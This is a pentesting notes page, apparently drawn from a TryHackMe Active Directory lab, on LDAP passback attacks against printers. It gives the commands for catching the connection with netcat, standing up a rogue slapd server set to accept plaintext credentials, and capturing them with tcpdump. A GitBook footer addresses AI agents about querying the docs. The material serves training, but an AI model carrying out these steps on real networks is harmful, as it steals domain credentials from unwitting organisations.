> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/windows/attacking-ad/passback.md).
# Passback Attacks
## LDAP
* Imagine we have a printer in the network. In the example on tryhackme we have access to the setting page. It has a login page so we can alter the Server IP and put ours instead\
* `nc -lvp 389`
* We get a connection back when sending the form. The console shows `supportedCapabilitiesresponse`
* As mentioned in the room:\
"The `supportedCapabilitiesresponse` tells us we have a problem. Essentially, before the printer sends over the credentials, it is trying to negotiate the LDAP authentication method details. It will use this negotiation to select the most secure authentication method that both the printer and the LDAP server support. If the authentication method is too secure, the credentials will not be transmitted in cleartext. With some authentication methods, the credentials will not be transmitted over the network at all! So we can't just use normal Netcat to harvest the credentials. We will need to create a rogue LDAP server and configure it insecurely to ensure the credentials are sent in plaintext."
* `sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd`
* `sudo dpkg-reconfigure -p low slapd` to configure the LDAP server
* We then have to make a file `olcSaslSecProps.ldif`
```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
* `sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart`
* `sudo tcpdump -SX -i eth0 tcp port 389` (we need to replace eth0 with the appropriate interface)
* And we should get the password, just like in the example from tryhackme :\
{% embed url="" %}
A Pen Tester’s Guide to Printer Hacking
{% endembed %}
## Resources
{% embed url="" %}
A Pen Tester’s Guide to Printer Hacking
{% endembed %}
{% embed url="" %}
Breaching AD - TryHackMe
{% endembed %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://csbygb.gitbook.io/pentips/windows/attacking-ad/passback.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.